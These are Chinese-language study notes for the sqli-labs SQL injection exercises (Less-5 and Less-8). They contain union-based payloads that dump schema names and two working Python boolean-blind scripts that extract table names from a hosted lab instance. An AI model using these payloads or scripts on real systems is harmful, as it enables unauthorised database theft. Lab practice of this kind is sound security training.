-
SQL 注入的前提
-
没有对用户输入进行过滤/转义,也没有对 SQL 语句使用预编译(参数化查询),用户输入被直接拼接进 SQL 语句。
-
select group_concat(table_name) from information_schema.tables where table_schema=database()
?id=-1") union select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() %23
?id=-1") UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )=','%23   (注意:MySQL 的 mid() 位置从 1 开始,位置 0 返回空字符串,条件永远为假)
import requests
import time
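# Boolean-based blind extraction of the current database's table names from
# sqli-labs Less-5. Only run this against systems you are authorised to test.
#
# Oracle: the page body has length TRUE_LENGTH when the injected condition is
# true and some other length otherwise. Calibrate TRUE_LENGTH by hand (fetch
# ?id=1 and measure the body) before running; a stale value makes every probe
# read as false and the script prints nothing.
TARGET = "https://sql.alienwares.top/Less-5/"
TRUE_LENGTH = 704
# Sub-query whose result is read out one character at a time.
TABLES_QUERY = (
    "(select group_concat(table_name) from information_schema.tables "
    "where table_schema=database())"
)
# Characters tried at each position. Table names may contain digits and
# underscores, not only a-z. The comparison is evaluated by MySQL, so under a
# case-insensitive collation a-z also matches upper-case letters — confirm
# this if the target uses a binary collation.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"
MAX_LEN = 100      # upper bound on the number of positions probed
SLEEP_EVERY = 10   # pause one second after this many positions (rate limiting)


def _condition_true(condition: str) -> bool:
    """Send one probe and report whether the injected SQL `condition` held.

    The payload closes the original quoted value, ANDs `condition` onto it and
    comments out the rest of the query with `#`. Passing it via `params` lets
    `requests` URL-encode quotes, spaces and `#` (-> %23) so any character in
    CHARSET reaches the server intact.
    """
    payload = f"1' and ({condition})#"
    response = requests.get(TARGET, params={"id": payload})
    return len(response.content) == TRUE_LENGTH


def _char_at(pos: int, ch: str) -> str:
    """SQL condition: the character at 1-based `pos` of the extracted string is `ch`."""
    # mid() positions start at 1; position 0 always yields '' in MySQL, so the
    # original loop wasted a whole round of probes on it.
    return f"(select mid({TABLES_QUERY},{pos},1))='{ch}'"


def main() -> None:
    """Print the comma-separated table names, one character per probe batch."""
    for pos in range(1, MAX_LEN + 1):
        if pos % SLEEP_EVERY == 0:
            time.sleep(1)
        # Try the separator first: after letters it is the most common character.
        if _condition_true(_char_at(pos, ",")):
            print(",", end="", flush=True)
            continue
        for ch in CHARSET:
            if _condition_true(_char_at(pos, ch)):
                print(ch, end="", flush=True)
                break
        else:
            # Nothing matched: either the string ended (mid() past the end
            # returns '') or the character is outside CHARSET. Distinguish the
            # two so the output stays aligned instead of silently dropping it.
            if _condition_true(_char_at(pos, "")):
                break
            print("?", end="", flush=True)
    print()


if __name__ == "__main__":
    main()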
?id=1" and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )='e' %23
Python 脚本同上,只是目标路径改为 Less-8、基准响应长度改为 706,并在每次请求后 sleep 1 秒。
@
import requests
import time
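# Boolean-based blind extraction of the current database's table names from
# sqli-labs Less-8. Only run this against systems you are authorised to test.
#
# Oracle: the page body has length TRUE_LENGTH (706 here) when the injected
# condition is true and some other length otherwise. Calibrate TRUE_LENGTH by
# hand (fetch ?id=1 and measure the body) before running; a stale value makes
# every probe read as false and the script prints nothing.
TARGET = "https://sql.alienwares.top/Less-8/"
TRUE_LENGTH = 706
# Sub-query whose result is read out one character at a time.
TABLES_QUERY = (
    "(select group_concat(table_name) from information_schema.tables "
    "where table_schema=database())"
)
# Characters tried at each position. Table names may contain digits and
# underscores, not only a-z. The comparison is evaluated by MySQL, so under a
# case-insensitive collation a-z also matches upper-case letters — confirm
# this if the target uses a binary collation.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"
MAX_LEN = 100        # upper bound on the number of positions probed
REQUEST_DELAY = 1.0  # seconds to wait after every request (rate limiting)


def _condition_true(condition: str) -> bool:
    """Send one probe and report whether the injected SQL `condition` held.

    The payload closes the original quoted value, ANDs `condition` onto it and
    comments out the rest of the query with `#`. Passing it via `params` lets
    `requests` URL-encode quotes, spaces and `#` (-> %23) so any character in
    CHARSET reaches the server intact. Every request is followed by
    REQUEST_DELAY so the target is not hammered.
    """
    payload = f"1' and ({condition})#"
    response = requests.get(TARGET, params={"id": payload})
    time.sleep(REQUEST_DELAY)
    return len(response.content) == TRUE_LENGTH


def _char_at(pos: int, ch: str) -> str:
    """SQL condition: the character at 1-based `pos` of the extracted string is `ch`."""
    # mid() positions start at 1; position 0 always yields '' in MySQL, so the
    # original loop wasted a whole round of probes on it.
    return f"(select mid({TABLES_QUERY},{pos},1))='{ch}'"


def main() -> None:
    """Print the comma-separated table names, one character per probe batch."""
    for pos in range(1, MAX_LEN + 1):
        # Try the separator first: after letters it is the most common character.
        if _condition_true(_char_at(pos, ",")):
            print(",", end="", flush=True)
            continue
        for ch in CHARSET:
            if _condition_true(_char_at(pos, ch)):
                print(ch, end="", flush=True)
                break
        else:
            # Nothing matched: either the string ended (mid() past the end
            # returns '') or the character is outside CHARSET. Distinguish the
            # two so the output stays aligned instead of silently dropping it.
            if _condition_true(_char_at(pos, "")):
                break
            print("?", end="", flush=True)
    print()


if __name__ == "__main__":
    main()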